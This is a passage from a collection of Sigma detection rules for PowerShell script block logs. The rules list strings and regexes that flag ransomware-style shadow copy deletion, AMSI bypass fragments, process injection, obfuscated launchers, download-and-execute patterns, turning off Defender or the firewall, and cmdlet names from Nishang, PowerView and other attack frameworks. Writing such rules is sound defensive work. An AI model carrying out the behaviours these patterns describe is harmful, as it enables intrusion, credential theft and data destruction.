ScriptBlockText|contains|all:
- set type=$LookupType`nserver
- $Command | nslookup 2>&1 | Out-String
- New-RandomDNSField
- '[Convert]::ToString($SYNOptions, 16)'
- $Session.Dead = $True
- $Session["Driver"] -eq
empire:
ScriptBlockText|contains|all:
- System.Diagnostics.Process
- Stop-Computer
- Restart-Computer
- Exception in execution
- $cmdargs
- Close-Dnscat2Tunnel
Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script
- source: sigma
- technicques:
- t1490
Description
Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Detection logic
condition: all of selection*
selection_delete:
ScriptBlockText|contains:
- .Delete()
- Remove-WmiObject
- rwmi
- Remove-CimInstance
- rcim
selection_get:
ScriptBlockText|contains:
- Get-WmiObject
- gwmi
- Get-CimInstance
- gcim
selection_shadowcopy:
ScriptBlockText|contains: Win32_Shadowcopy
WMIC Unquoted Services Path Lookup - PowerShell
- source: sigma
- technicques:
- t1047
Description
Detects known WMI recon method to look for unquoted service paths, often used by pentest inside of powershell scripts attackers enum scripts
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- 'Get-WmiObject '
- 'gwmi '
ScriptBlockText|contains|all:
- ' Win32_Service '
- Name
- DisplayName
- PathName
- StartMode
Potential WinAPI Calls Via PowerShell Scripts
- source: sigma
- technicques:
- t1059
- t1059.001
- t1106
Description
Detects use of WinAPI functions in PowerShell scripts
Detection logic
condition: 1 of selection_*
selection_duplicate_token:
ScriptBlockText|contains|all:
- OpenProcessToken
- DuplicateTokenEx
- CloseHandle
selection_injection:
ScriptBlockText|contains|all:
- VirtualAlloc
- OpenProcess
- WriteProcessMemory
- CreateRemoteThread
selection_process_write_read:
ScriptBlockText|contains|all:
- WriteProcessMemory
- VirtualAlloc
- ReadProcessMemory
- VirtualFree
selection_token_steal:
ScriptBlockText|contains|all:
- OpenProcessToken
- LookupPrivilegeValue
- AdjustTokenPrivileges
Invoke-Obfuscation CLIP+ Launcher - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of Clip.exe to execute PowerShell
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: cmd.{0,5}(?:/c|/r).+clip(?:\.exe)?.{0,4}&&.+clipboard]::\(\s\\"\{\d\}.+-f.+"
PowerShell Set-Acl On Windows Folder - PsScript
- source: sigma
- technicques:
- t1222
Description
Detects PowerShell scripts to set the ACL to a file in the Windows folder
Detection logic
condition: all of selection_*
selection_cmdlet:
ScriptBlockText|contains|all:
- 'Set-Acl '
- '-AclObject '
selection_paths:
ScriptBlockText|contains:
- -Path "C:\Windows
- -Path "C:/Windows
- -Path 'C:\Windows
- -Path 'C:/Windows
- -Path C:\\Windows
- -Path C:/Windows
- -Path $env:windir
- -Path "$env:windir
- -Path '$env:windir
selection_permissions:
ScriptBlockText|contains:
- FullControl
- Allow
Suspicious PowerShell Mailbox Export to Share - PS
- source: sigma
- technicques:
Description
Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- New-MailboxExportRequest
- ' -Mailbox '
- ' -FilePath \\\\'
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
Detection logic
condition: selection_iex
selection_iex:
- ScriptBlockText|re: \$PSHome\[\s*\d{1,3}\s*\]\s*\+\s*\$PSHome\[
- ScriptBlockText|re: \$ShellId\[\s*\d{1,3}\s*\]\s*\+\s*\$ShellId\[
- ScriptBlockText|re: \$env:Public\[\s*\d{1,3}\s*\]\s*\+\s*\$env:Public\[
- ScriptBlockText|re: \$env:ComSpec\[(\s*\d{1,3}\s*,){2}
- ScriptBlockText|re: \*mdr\*\W\s*\)\.Name
- ScriptBlockText|re: \$VerbosePreference\.ToString\(
Automated Collection Command PowerShell
- source: sigma
- technicques:
- t1119
Description
Once established within a system or network, an adversary may use automated techniques for collecting internal data.
Detection logic
condition: all of selection*
selection_cmd:
ScriptBlockText|contains|all:
- Get-ChildItem
- ' -Recurse '
- ' -Include '
selection_ext:
ScriptBlockText|contains:
- .doc
- .docx
- .xls
- .xlsx
- .ppt
- .pptx
- .rtf
- .pdf
- .txt
Recon Information for Export with PowerShell
- source: sigma
- technicques:
- t1119
Description
Once established within a system or network, an adversary may use automated techniques for collecting internal data
Detection logic
condition: all of selection*
selection_action:
ScriptBlockText|contains:
- 'Get-Service '
- 'Get-ChildItem '
- 'Get-Process '
selection_redirect:
ScriptBlockText|contains: '> $env:TEMP\'
Winlogon Helper DLL
- source: sigma
- technicques:
- t1547
- t1547.004
Description
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[Wow6432Node]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
Detection logic
condition: all of selection*
selection:
ScriptBlockText|contains: CurrentVersion\Winlogon
selection2:
ScriptBlockText|contains:
- Set-ItemProperty
- New-Item
Code Executed Via Office Add-in XLL File
- source: sigma
- technicques:
- t1137
- t1137.006
Description
Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- 'new-object '
- '-ComObject '
- .application
- .RegisterXLL
PowerShell WMI Win32_Product Install MSI
- source: sigma
- technicques:
- t1218
- t1218.007
Description
Detects the execution of an MSI file using PowerShell and the WMI Win32_Product class
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- 'Invoke-CimMethod '
- '-ClassName '
- 'Win32_Product '
- '-MethodName '
- .msi
Suspicious Connection to Remote Account
- source: sigma
- technicques:
- t1110
- t1110.001
Description
Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- System.DirectoryServices.Protocols.LdapDirectoryIdentifier
- System.Net.NetworkCredential
- System.DirectoryServices.Protocols.LdapConnection
Powershell Add Name Resolution Policy Table Rule
- source: sigma
- technicques:
- t1565
Description
Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace. This will bypass the default DNS server and uses a specified server for answering the query.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- Add-DnsClientNrptRule
- -Namesp
- -NameSe
Import PowerShell Modules From Suspicious Directories
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects powershell scripts that import modules from suspicious directories
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Import-Module "$Env:Temp\
- Import-Module '$Env:Temp\
- Import-Module $Env:Temp\
- Import-Module "$Env:Appdata\
- Import-Module '$Env:Appdata\
- Import-Module $Env:Appdata\
- Import-Module C:\Users\Public\
- ipmo "$Env:Temp\
- ipmo '$Env:Temp\
- ipmo $Env:Temp\
- ipmo "$Env:Appdata\
- ipmo '$Env:Appdata\
- ipmo $Env:Appdata\
- ipmo C:\Users\Public\
Windows Firewall Profile Disabled
- source: sigma
- technicques:
- t1562
- t1562.004
Description
Detects when a user disables the Windows Firewall via a Profile to help evade defense.
Detection logic
condition: all of selection*
selection_args:
ScriptBlockText|contains|all:
- 'Set-NetFirewallProfile '
- ' -Enabled '
- ' False'
selection_opt:
ScriptBlockText|contains:
- ' -All '
- Public
- Domain
- Private
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via COMPRESS OBFUSCATION
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|contains:
- system.io.compression.deflatestream
- system.io.streamreader
ScriptBlockText|contains|all:
- new-object
- text.encoding]::ascii
ScriptBlockText|endswith: readtoend
Suspicious TCP Tunnel Via PowerShell Script
- source: sigma
- technicques:
- t1090
Description
Detects powershell scripts that creates sockets/listeners which could be indicative of tunneling activity
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- '[System.Net.HttpWebRequest]'
- System.Net.Sockets.TcpListener
- AcceptTcpClient
Invoke-Obfuscation Via Use MSHTA - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use MSHTA in Scripts
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|contains|all:
- set
- '&&'
- mshta
- vbscript:createobject
- .run
- (window.close)
Potential Persistence Via Security Descriptors - ScriptBlock
- source: sigma
- technicques:
Description
Detects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- \Lsa\JD
- \Lsa\Skew1
- \Lsa\Data
- \Lsa\GBG
ScriptBlockText|contains|all:
- win32_Trustee
- win32_Ace
- .AccessMask
- .AceType
- .SetSecurityDescriptor
Windows Defender Exclusions Added - PowerShell
- source: sigma
- technicques:
- t1059
- t1562
Description
Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
Detection logic
condition: all of selection*
selection_args_exc:
ScriptBlockText|contains:
- ' -ExclusionPath '
- ' -ExclusionExtension '
- ' -ExclusionProcess '
- ' -ExclusionIpAddress '
selection_args_pref:
ScriptBlockText|contains:
- 'Add-MpPreference '
- 'Set-MpPreference '
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock
- source: sigma
- technicques:
- t1218
Description
Detects PowerShell module creation where the module Contents are set to “function Get-VMRemoteFXPhysicalVideoAdapter”. This could be a sign of potential abuse of the “RemoteFXvGPUDisablement.exe” binary which is known to be vulnerable to module load-order hijacking.
Detection logic
condition: selection
selection:
ScriptBlockText|startswith: function Get-VMRemoteFXPhysicalVideoAdapter {
PowerShell ShellCode
- source: sigma
- technicques:
- t1055
- t1059
- t1059.001
Description
Detects Base64 encoded Shellcode
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- OiCAAAAYInlM
- OiJAAAAYInlM
PowerShell Credential Prompt
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects PowerShell calling a credential prompt
Detection logic
condition: selection
selection:
ScriptBlockText|contains: PromptForCredential
AMSI Bypass Pattern Assembly GetType
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- '[Ref].Assembly.GetType'
- SetValue($null,$true)
- NonPublic,Static
PowerShell PSAttack
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects the use of PSAttack PowerShell hack tool
Detection logic
condition: selection
selection:
ScriptBlockText|contains: PS ATTACK!!!
PowerView PowerShell Cmdlets - ScriptBlock
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects Cmdlet names from PowerView of the PowerSploit exploitation framework.
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Export-PowerViewCSV
- Find-DomainLocalGroupMember
- Find-DomainObjectPropertyOutlier
- Find-DomainProcess
- Find-DomainShare
- Find-DomainUserEvent
- Find-DomainUserLocation
- Find-ForeignGroup
- Find-ForeignUser
- Find-GPOComputerAdmin
- Find-GPOLocation
- Find-InterestingDomain
- Find-InterestingFile
- Find-LocalAdminAccess
- Find-ManagedSecurityGroups
- Get-CachedRDPConnection
- Get-DFSshare
- Get-DomainDFSShare
- Get-DomainDNSRecord
- Get-DomainDNSZone
- Get-DomainFileServer
- Get-DomainGPOComputerLocalGroupMapping
- Get-DomainGPOLocalGroup
- Get-DomainGPOUserLocalGroupMapping
- Get-LastLoggedOn
- Get-LoggedOnLocal
- Get-NetFileServer
- Get-NetForest
- Get-NetGPOGroup
- Get-NetProcess
- Get-NetRDPSession
- Get-RegistryMountedDrive
- Get-RegLoggedOn
- Get-WMIRegCachedRDPConnection
- Get-WMIRegLastLoggedOn
- Get-WMIRegMountedDrive
- Get-WMIRegProxy
- Invoke-ACLScanner
- Invoke-CheckLocalAdminAccess
- Invoke-EnumerateLocalAdmin
- Invoke-EventHunter
- Invoke-FileFinder
- Invoke-Kerberoast
- Invoke-MapDomainTrust
- Invoke-ProcessHunter
- Invoke-RevertToSelf
- Invoke-ShareFinder
- Invoke-UserHunter
- Invoke-UserImpersonation
- Remove-RemoteConnection
- Request-SPNTicket
- Resolve-IPAddress
Powershell Local Email Collection
- source: sigma
- technicques:
- t1114
- t1114.001
Description
Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a users local system, such as Outlook storage or cache files.
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Get-Inbox.ps1
- Microsoft.Office.Interop.Outlook
- Microsoft.Office.Interop.Outlook.olDefaultFolders
- -comobject outlook.application
Suspicious PowerShell Invocations - Specific
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects suspicious PowerShell invocation command parameters
Detection logic
condition: 1 of selection_* and not 1 of filter_*
filter_chocolatey:
ScriptBlockText|contains:
- (New-Object System.Net.WebClient).DownloadString('https://community.chocolatey.org/install.ps1
- (New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1')
- Write-ChocolateyWarning
selection_convert_b64:
ScriptBlockText|contains|all:
- -nop
- ' -w '
- hidden
- ' -c '
- '[Convert]::FromBase64String'
selection_enc_selection:
ScriptBlockText|contains|all:
- ' -w '
- hidden
- -ep
- bypass
- -Enc
selection_iex_selection:
ScriptBlockText|contains|all:
- ' -w '
- hidden
- -noni
- -nop
- ' -c '
- iex
- New-Object
selection_iex_webclient:
ScriptBlockText|contains|all:
- iex
- New-Object
- Net.WebClient
- .Download
selection_reg_selection:
ScriptBlockText|contains|all:
- powershell
- reg
- add
- HKCU\software\microsoft\windows\currentversion\run
selection_webclient_selection:
ScriptBlockText|contains|all:
- bypass
- -noprofile
- -windowstyle
- hidden
- new-object
- system.net.webclient
- .download
Powershell WMI Persistence
- source: sigma
- technicques:
- t1546
- t1546.003
Description
Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.
Detection logic
condition: selection_ioc
selection_ioc:
- ScriptBlockText|contains|all:
- 'New-CimInstance '
- '-Namespace root/subscription '
- '-ClassName __EventFilter '
- '-Property '
- ScriptBlockText|contains|all:
- 'New-CimInstance '
- '-Namespace root/subscription '
- '-ClassName CommandLineEventConsumer '
- '-Property '
Invoke-Obfuscation STDIN+ Launcher - Powershell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated use of stdin to execute PowerShell
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: cmd.{0,5}(?:/c|/r).+powershell.+(?:\$?\{?input\}?|noexit).+"
Suspicious PowerShell WindowStyle Option
- source: sigma
- technicques:
- t1564
- t1564.003
Description
Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
Detection logic
condition: selection and not filter
filter:
ScriptBlockText|contains|all:
- :\Program Files\Amazon\WorkSpacesConfig\Scripts\
- $PSScriptRoot\Module\WorkspaceScriptModule\WorkspaceScriptModule
selection:
ScriptBlockText|contains|all:
- powershell
- WindowStyle
- Hidden
Powershell Detect Virtualization Environment
- source: sigma
- technicques:
- t1497
- t1497.001
Description
Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
Detection logic
condition: all of selection*
selection_action:
ScriptBlockText|contains:
- Get-WmiObject
- gwmi
selection_module:
ScriptBlockText|contains:
- MSAcpi_ThermalZoneTemperature
- Win32_ComputerSystem
Replace Desktop Wallpaper by Powershell
- source: sigma
- technicques:
- t1491
- t1491.001
Description
An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper
Detection logic
condition: 1 of selection_*
selection_1:
ScriptBlockText|contains|all:
- Get-ItemProperty
- 'Registry::'
- HKEY_CURRENT_USER\Control Panel\Desktop\
- WallPaper
selection_2:
ScriptBlockText|contains: SystemParametersInfo(20,0,*,3)
Suspicious Get Information for SMB Share
- source: sigma
- technicques:
- t1069
- t1069.001
Description
Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Detection logic
condition: selection
selection:
ScriptBlockText|contains: get-smbshare
Potential PowerShell Obfuscation Using Alias Cmdlets
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- 'Set-Alias '
- 'New-Alias '
Powershell Sensitive File Discovery
- source: sigma
- technicques:
- t1083
Description
Detect adversaries enumerate sensitive files
Detection logic
condition: all of selection_*
selection_action:
ScriptBlockText|contains:
- ls
- get-childitem
- gci
selection_file:
ScriptBlockText|contains:
- .pass
- .kdbx
- .kdb
selection_recurse:
ScriptBlockText|contains: -recurse
Change User Agents with WebRequest
- source: sigma
- technicques:
- t1071
- t1071.001
Description
Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- Invoke-WebRequest
- '-UserAgent '
Remove Account From Domain Admin Group
- source: sigma
- technicques:
- t1531
Description
Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- Remove-ADGroupMember
- '-Identity '
- '-Members '
Enumerate Credentials from Windows Credential Manager With PowerShell
- source: sigma
- technicques:
- t1555
Description
Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials.
Detection logic
condition: all of selection_*
selection_cmd:
ScriptBlockText|contains|all:
- vaultcmd
- '/listcreds:'
selection_option:
ScriptBlockText|contains:
- Windows Credentials
- Web Credentials
NTFS Alternate Data Stream
- source: sigma
- technicques:
- t1059
- t1059.001
- t1564
- t1564.004
Description
Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Detection logic
condition: all of selection*
selection_content:
ScriptBlockText|contains:
- set-content
- add-content
selection_stream:
ScriptBlockText|contains: -stream
Disable-WindowsOptionalFeature Command PowerShell
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Detection logic
condition: all of selection*
selection_cmd:
ScriptBlockText|contains|all:
- Disable-WindowsOptionalFeature
- -Online
- -FeatureName
selection_feature:
ScriptBlockText|contains:
- Windows-Defender-Gui
- Windows-Defender-Features
- Windows-Defender
- Windows-Defender-ApplicationGuard
Suspicious Get Local Groups Information - PowerShell
- source: sigma
- technicques:
- t1069
- t1069.001
Description
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
Detection logic
condition: 1 of test_*
test_3:
ScriptBlockText|contains:
- get-localgroup
- Get-LocalGroupMember
test_6:
ScriptBlockText|contains|all:
- Get-WMIObject
- Win32_Group
Extracting Information with PowerShell
- source: sigma
- technicques:
- t1552
- t1552.001
Description
Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- ls
- ' -R'
- 'select-string '
- '-Pattern '
Malicious Nishang PowerShell Commandlets
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects Commandlet names and arguments from the Nishang exploitation framework
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Add-ConstrainedDelegationBackdoor
- Copy-VSS
- Create-MultipleSessions
- DataToEncode
- DNS_TXT_Pwnage
- Do-Exfiltration-Dns
- Download_Execute
- Download-Execute-PS
- DownloadAndExtractFromRemoteRegistry
- DumpCerts
- DumpCreds
- DumpHashes
- Enable-DuplicateToken
- Enable-Duplication
- Execute-Command-MSSQL
- Execute-DNSTXT-Code
- Execute-OnTime
- ExetoText
- exfill
- ExfilOption
- FakeDC
- FireBuster
- FireListener
- 'Get-Information '
- Get-PassHints
- Get-Web-Credentials
- Get-WebCredentials
- Get-WLAN-Keys
- HTTP-Backdoor
- Invoke-AmsiBypass
- Invoke-BruteForce
- Invoke-CredentialsPhish
- Invoke-Decode
- Invoke-Encode
- Invoke-Interceptor
- Invoke-JSRatRegsvr
- Invoke-JSRatRundll
- Invoke-MimikatzWDigestDowngrade
- Invoke-NetworkRelay
- Invoke-PowerShellIcmp
- Invoke-PowerShellUdp
- Invoke-Prasadhak
- Invoke-PSGcat
- Invoke-PsGcatAgent
- Invoke-SessionGopher
- Invoke-SSIDExfil
- LoggedKeys
- Nishang
- NotAllNameSpaces
- Out-CHM
- OUT-DNSTXT
- Out-HTA
- Out-RundllCommand
- Out-SCF
- Out-SCT
- Out-Shortcut
- Out-WebQuery
- Out-Word
- Parse_Keys
- Password-List
- Powerpreter
- Remove-Persistence
- Remove-PoshRat
- Remove-Update
- Run-EXEonRemote
- Set-DCShadowPermissions
- Set-RemotePSRemoting
- Set-RemoteWMI
- Shellcode32
- Shellcode64
- StringtoBase64
- TexttoExe
Clearing Windows Console History
- source: sigma
- technicques:
- t1070
- t1070.003
Description
Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
Detection logic
condition: selection1 or selection2a and selection2b
selection1:
ScriptBlockText|contains: Clear-History
selection2a:
ScriptBlockText|contains:
- Remove-Item
- rm
selection2b:
ScriptBlockText|contains:
- ConsoleHost_history.txt
- (Get-PSReadlineOption).HistorySavePath
PowerShell ADRecon Execution
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects execution of ADRecon.ps1 for AD reconnaissance which has been reported to be actively used by FIN7
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Function Get-ADRExcelComOb
- Get-ADRGPO
- Get-ADRDomainController
- ADRecon-Report.xlsx
Request A Single Ticket via PowerShell
- source: sigma
- technicques:
- t1558
- t1558.003
Description
utilize native PowerShell Identity modules to query the domain to extract the Service Principal Names for a single computer. This behavior is typically used during a kerberos or silver ticket attack. A successful execution will output the SPNs for the endpoint in question.
Detection logic
condition: selection
selection:
ScriptBlockText|contains: System.IdentityModel.Tokens.KerberosRequestorSecurityToken
Automated Collection Bookmarks Using Get-ChildItem PowerShell
- source: sigma
- technicques:
- t1217
Description
Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- Get-ChildItem
- ' -Recurse '
- ' -Path '
- ' -Filter Bookmarks'
- ' -ErrorAction SilentlyContinue'
- ' -Force'
Malicious ShellIntel PowerShell Commandlets
- source: sigma
- technicques:
- t1059
- t1059.001
Description
Detects Commandlet names from ShellIntel exploitation scripts.
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- Invoke-SMBAutoBrute
- Invoke-GPOLinks
- Invoke-Potato
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via VAR++ LAUNCHER
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: (?i)&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c
DirectorySearcher Powershell Exploitation
- source: sigma
- technicques:
- t1018
Description
Enumerates Active Directory to determine computers that are joined to the domain
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- 'New-Object '
- System.DirectoryServices.DirectorySearcher
- .PropertiesToLoad.Add
- .findall()
- Properties.name
PowerShell Script Change Permission Via Set-Acl - PsScript
- source: sigma
- technicques:
- t1222
Description
Detects PowerShell scripts set ACL to of a file or a folder
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- 'Set-Acl '
- '-AclObject '
- '-Path '
Potential AMSI Bypass Script Using NULL Bits
- source: sigma
- technicques:
- t1562
- t1562.001
Description
Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Detection logic
condition: selection
selection:
ScriptBlockText|contains:
- if(0){{{0}}}' -f $(0 -as [char]) +
- '#<NULL>'
Invoke-Obfuscation Via Use Clip - Powershell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via use Clip.exe in Scripts
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: (?i)echo.*clip.*&&.*(Clipboard|i`?n`?v`?o`?k`?e`?)
Active Directory Computers Enumeration With Get-AdComputer
- source: sigma
- technicques:
- t1018
- t1087
- t1087.002
Description
Detects usage of the “Get-AdComputer” to enumerate Computers or properties within Active Directory.
Detection logic
condition: all of selection_*
selection_cmdlet:
ScriptBlockText|contains: 'Get-AdComputer '
selection_option:
ScriptBlockText|contains:
- '-Filter '
- '-LDAPFilter '
- '-Properties '
Invoke-Obfuscation Via Stdin - Powershell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via Stdin in Scripts
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|re: (?i)(set).*&&\s?set.*(environment|invoke|\$\{?input).*&&.*"
AD Groups Or Users Enumeration Using PowerShell - ScriptBlock
- source: sigma
- technicques:
- t1069
- t1069.001
Description
Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.
Detection logic
condition: 1 of test_*
test_2:
ScriptBlockText|contains: get-ADPrincipalGroupMembership
test_7:
ScriptBlockText|contains|all:
- get-aduser
- '-f '
- '-pr '
- DoesNotRequirePreAuth
Suspicious New-PSDrive to Admin Share
- source: sigma
- technicques:
- t1021
- t1021.002
Description
Adversaries may use to interact with a remote network share using Server Message Block (SMB). The adversary may then perform actions as the logged-on user.
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- New-PSDrive
- '-psprovider '
- filesystem
- '-root '
- \\\\
- $
Windows Screen Capture with CopyFromScreen
- source: sigma
- technicques:
- t1113
Description
Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations
Detection logic
condition: selection
selection:
ScriptBlockText|contains: .CopyFromScreen
Delete Volume Shadow Copies via WMI with PowerShell - PS Script
- source: sigma
- technicques:
- t1490
Description
Deletes Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil
Detection logic
condition: selection
selection:
ScriptBlockText|contains|all:
- Get-WmiObject
- Win32_Shadowcopy
- .Delete()
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell
- source: sigma
- technicques:
- t1027
- t1059
- t1059.001
Description
Detects Obfuscated Powershell via RUNDLL LAUNCHER
Detection logic
condition: selection_4104
selection_4104:
ScriptBlockText|contains|all:
- rundll32.exe
- shell32.dll
- shellexec_rundll
- powershell
Malicious PowerShell Commandlets - ScriptBlock
- source: sigma
- technicques:
- t1059
- t1059.001
- t1069
- t1069.001
- t1069.002
- t1087
- t1087.001
- t1087.002
- t1482
Description
Detects Commandlet names from well-known PowerShell exploitation frameworks
Detection logic
condition: selection and not 1 of filter_optional_*
filter_optional_amazon_ec2:
ScriptBlockText|contains:
- Get-SystemDriveInfo
- C:\ProgramData\Amazon\EC2-Windows\Launch\Module\
selection:
ScriptBlockText|contains:
- Add-Exfiltration
- Add-Persistence
- Add-RegBackdoor
- Add-RemoteRegBackdoor
- Add-ScrnSaveBackdoor
- ConvertTo-Rc4ByteStream
- Decrypt-Hash
- Disable-ADIDNSNode
- Do-Exfiltration
- Enable-ADIDNSNode
- Enabled-DuplicateToken
- Exploit-Jboss
- Export-ADRCSV
- Export-ADRExcel
- Export-ADRHTML
- Export-ADRJSON
- Export-ADRXML
- Find-Fruit
- Find-GPOLocation
- Find-TrustedDocuments
- Get-ADIDNSNodeAttribute
- Get-ADIDNSNodeOwner
- Get-ADIDNSNodeTombstoned
- Get-ADIDNSPermission
- Get-ADIDNSZone
- Get-ChromeDump
- Get-ClipboardContents
- Get-FoxDump
- Get-GPPPassword
- Get-IndexedItem
- Get-KerberosAESKey
- Get-Keystrokes
- Get-LSASecret
- Get-PassHashes
- Get-RegAlwaysInstallElevated
- Get-RegAutoLogon
- Get-RemoteBootKey
- Get-RemoteCachedCredential
- Get-RemoteLocalAccountHash
- Get-RemoteLSAKey
- Get-RemoteMachineAccountHash
- Get-RemoteNLKMKey
- Get-RickAstley
- Get-SecurityPackages
- Get-ServiceFilePermission
- Get-ServicePermission
- Get-ServiceUnquoted
- Get-SiteListPassword
- Get-System
- Get-TimedScreenshot
- Get-UnattendedInstallFile
- Get-Unconstrained
- Get-USBKeystrokes
- Get-VaultCredential
- Get-VulnAutoRun
